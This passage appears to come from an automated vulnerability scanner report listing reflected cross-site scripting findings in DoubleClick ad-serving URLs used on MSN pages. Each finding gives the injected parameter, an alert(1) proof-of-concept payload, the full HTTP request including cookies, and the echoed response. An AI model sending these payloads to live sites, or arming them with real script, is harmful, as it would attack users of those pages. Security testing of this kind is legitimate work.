document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269dcca2'-alert(1)-'45c41a84c6f&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/m%3B236296416%3B0-0%3B0%3B59899981%3B3454-728/90%3B40601181/40618968/1
...[SNIP]...

3.27. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe8a1'-alert(1)-'5595f073e76 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=Gfe8a1'-alert(1)-'5595f073e76&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:28 GMT
Expires: Sun, 13 Feb 2011 14:32:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=Gfe8a1'-alert(1)-'5595f073e76&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/90%3B4
...[SNIP]...

3.28. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef4e2"-alert(1)-"cbc257ad217 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=Gef4e2"-alert(1)-"cbc257ad217&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:24 GMT
Expires: Sun, 13 Feb 2011 14:32:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6858

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8024/SF_Vows_728x90_bkup.jpg";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=Gef4e2"-alert(1)-"cbc257ad217&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/m%3B236296416%3B0-0%3B0%3B59899981%3B3454-728/90%3B4
...[SNIP]...

3.29. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f489'-alert(1)-'f3a86c438fd was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=1f489'-alert(1)-'f3a86c438fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6858
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:28:11 GMT
Expires: Sun, 13 Feb 2011 14:33:11 GMT

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=1f489'-alert(1)-'f3a86c438fdhttp://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/m%3B236296416%3B0-0%3B0%3B59899981%3B3454-728/90%3B40601181/40618968/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.slim-fast
...[SNIP]...

3.30. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61db6"-alert(1)-"cb99475ace5 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=61db6"-alert(1)-"cb99475ace5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6795
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:28:07 GMT
Expires: Sun, 13 Feb 2011 14:33:07 GMT

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=61db6"-alert(1)-"cb99475ace5http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B59899981%3B3454-728/90%3B40646324/40664111/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://slim-fast.com
...[SNIP]...

3.31. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e6b6'-alert(1)-'a8702fb3324 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!4e6b6'-alert(1)-'a8702fb3324&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:11 GMT
Expires: Sun, 13 Feb 2011 14:32:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6858

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!4e6b6'-alert(1)-'a8702fb3324&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/m%3B236296416%3B0-0%3B0%3B5989998
...[SNIP]...

3.32. http://ad.doubleclick.net/adj/N1243.unilevermsn/B5101540.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1243.unilevermsn/B5101540.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 468c3"-alert(1)-"f24b680a126 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N1243.unilevermsn/B5101540.4;sz=728x90;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!468c3"-alert(1)-"f24b680a126&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=;ord=1260931160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:27:06 GMT
Expires: Sun, 13 Feb 2011 14:32:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6795

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
://s0.2mdn.net/468024/SF_6xaDay_728x90_bkup.jpg";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003U/64000000000034832.1?!468c3"-alert(1)-"f24b680a126&&PID=8352252&UIT=G&TargetID=31057269&AN=1260931160&PG=FTBLI7&ASID=e6d24f2be8264ff0a95102b14519d6e0&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/r%3B236296416%3B1-0%3B0%3B5989998
...[SNIP]...

3.33. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 461a3"-alert(1)-"78c500a4e3 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026461a3"-alert(1)-"78c500a4e3&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:38:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5913

document.write('\n<script src=\"http://
...[SNIP]...
.net/1659706/1-2010_nm_1pharm_300x250_30k.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026461a3"-alert(1)-"78c500a4e3&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/da/%2a/n%3B234093089%3B2-0%3B0%3B58016850%3B4307-300/2
...[SNIP]...

3.34. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44945'-alert(1)-'3203cd0359e was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=800002644945'-alert(1)-'3203cd0359e&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5960

document.write('\n<script src=\"http://
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=800002644945'-alert(1)-'3203cd0359e&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/g%3B234093089%3B0-0%3B0%3B58016850%3B4307-300/2
...[SNIP]...

3.35. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72ecb"-alert(1)-"7f68150d7b3 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=70630058072ecb"-alert(1)-"7f68150d7b3&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5919

document.write('\n<script src=\"http://
...[SNIP]...
_30k.jpg";
minV = 6;
FWH = ' width="300" height="250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=70630058072ecb"-alert(1)-"7f68150d7b3&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/b%3B234093089%3B3-0%3B0%3B58016850%3B4307-300/250%3B40240516/40258303/1%3B%3B%7Eokv%
...[SNIP]...

3.36. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42f80'-alert(1)-'82db29c0a28 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=70630058042f80'-alert(1)-'82db29c0a28&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5960

document.write('\n<script src=\"http://
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=70630058042f80'-alert(1)-'82db29c0a28&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/g%3B234093089%3B0-0%3B0%3B58016850%3B4307-300/250%3B39944129/39961916/1%3B%3B%7Eokv%
...[SNIP]...

3.37. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae5bf"-alert(1)-"5d130edfbaa was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21ae5bf"-alert(1)-"5d130edfbaa&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5919

document.write('\n<script src=\"http://
...[SNIP]...
"250" ';
url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21ae5bf"-alert(1)-"5d130edfbaa&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/b%3B234093089%3B3-0%3B0%3B58016850%3B4307-300/250%3B40240516/40258303/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

3.38. http://ad.doubleclick.net/adj/N3740.MSN/B5123771.2 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3740.MSN/B5123771.2

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf092'-alert(1)-'a878c05666a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3740.MSN/B5123771.2;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21cf092'-alert(1)-'a878c05666a&destination=;ord=706300580? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:39:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5960

document.write('\n<script src=\"http://
...[SNIP]...
rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/74000000000038932.1?!&&PID=8000026&UIT=G&TargetID=35613013&AN=706300580&PG=HEAR01&ASID=19ec05578f844eb7889608a63552ed21cf092'-alert(1)-'a878c05666a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/db/%2a/g%3B234093089%3B0-0%3B0%3B58016850%3B4307-300/250%3B39944129/39961916/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
